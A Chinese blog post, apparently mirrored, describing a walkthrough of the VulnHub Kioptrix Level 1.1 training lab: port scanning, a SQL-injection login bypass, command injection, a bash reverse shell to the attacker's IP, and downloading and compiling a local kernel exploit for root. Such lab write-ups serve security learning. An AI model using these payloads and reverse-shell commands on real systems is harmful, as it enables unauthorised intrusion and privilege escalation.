zoukankan      html  css  js  c++  java
  • PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1.1

    猫宁~~~

    地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

    重点关注工具使用和测试思路。

    kali linux攻击机   192.168.100.4

    nmap 192.168.100.0/24

    发现靶机

    kioptr靶机IP   192.168.100.9

    nmap -sV -p1-65535 192.168.100.9

    获取指纹信息:

    22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)

    80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))

    111/tcp  open  rpcbind    2 (RPC #100000)

    443/tcp  open  ssl/https?

    631/tcp  open  ipp        CUPS 1.1

    666/tcp  open  status     1 (RPC #100024)

    3306/tcp open  mysql      MySQL (unauthorized)

    访问http://192.168.100.9/,显示登录框

    用户名:admin'  or '1'='1--   密码:123456

    通过万能密码直接登录成功。

    显示Welcome to the Basic Administrative Web Console

    输入0 && whoami,得知服务权限apache

    输入;bash -i >& /dev/tcp/192.168.100.4/6666 0>&1执行

    kali linux上nc -lvnp 6666,获取权限

    uname -a,查看版本

    Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

    可以提权。

    searchsploit 9545

    /usr/share/exploitdb/exploits/linux/local/9545.c

    地址:https://www.exploit-db.com/exploits/9545

    cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/9545.c

    python -m SimpleHTTPServer 80

    靶机cd /tmp并wget http://192.168.100.6/9545.c

    靶机gcc -o muma 9545.c

    靶机执行./muma,顺利实现提权。

    bash-3.00$变为sh-3.00$,root权限。

  • 相关阅读:
    决策树分类
    集群服务器 获取COOKIE错误
    React 自写Loading
    HTB-靶机-Unattended
    HTB-靶机-LaCasaDePapel
    HTB-靶机-FriendZone
    HTB-靶机-CTF
    HTB-靶机-FluJab
    HTB-靶机-Help
    HTB-靶机-Chaos
  • 原文地址:https://www.cnblogs.com/landesk/p/13630169.html
Copyright © 2011-2022 走看看